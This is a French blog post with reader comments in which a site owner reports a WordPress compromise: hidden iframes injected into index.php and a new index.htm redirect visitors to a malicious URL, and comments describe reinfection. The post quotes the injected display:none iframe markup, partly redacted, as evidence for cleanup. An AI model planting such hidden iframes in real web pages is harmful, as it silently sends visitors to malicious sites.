http://olthart.com/imag/in.cgi

Dans la série « WP m’a tuer » que je croyais terminée, j’ai eu une mauvaise surprise. Ces pages sont restées inaccessibles pendant quelques jours. Faute de temps et de disponibilité je n’ai pu vérifier que ce soir ce qui s’était passé. Il s’agissait apparemment d’une attaque classique avec création et détournement d’une page index.htm à l’aide de deux iframe et détournement de la page index.php existante de Word-Press sur laquelle l’intrus a rajouté ces iframe pour détourner les visiteurs vers un site malveillant :
iframe [...code supprimé] src=’http://olthart.com/imag/in.cgi?2 ‘ [...code supprimé] width=’261′ height=’249′ style=’display:none’> iframe [...code supprimé] src=’http://olthart.com/imag/in.cgi?2 ‘ [...code supprimé] width=’5′ height=’304′ style=’display:none’> /iframe

Il va de soi que j’ai supprimé ce code malveillant avant de remettre en ligne la page index.php de WP.

Il reste à comprendre comment l’intrus est entré sur le serveur. Soit par le FTP, soit par l’entrée administrative de WordPress. Il est possible en effet de modifier le fichier index.php dans Word-Press, mais j’ignore comment dans ce cas il aurait créé le fichier index.htm

Tags:

3 Responses to “http://olthart.com/imag/in.cgi”

  1. kerbacho écrit :

    Non seulement ce n’est pas fini, mais on dirait que ça recommence :
    J’avais réparé le fichier index.php mercredi 3 avril et le lendemain c’était reparti !

  2. kerbacho écrit :

    J’avais déjà remarqué mercredi soir la présence d’un message d’erreur au-dessus des pages commentées :
    Warning: Cannot modify header information – headers already sent by (output started at /mnt/124/free.fr/0/4/sarod/index.php:1) in /mnt/124/free.fr/0/4/sarod/wp-content/plugins/smart-unread-comments.php on line 83

  3. débloque-notes » Blog Archive » ntos.exe écrit :

    [...] WP m’a tuer « http://olthart.com/imag/in.cgi [...]

Répondre

*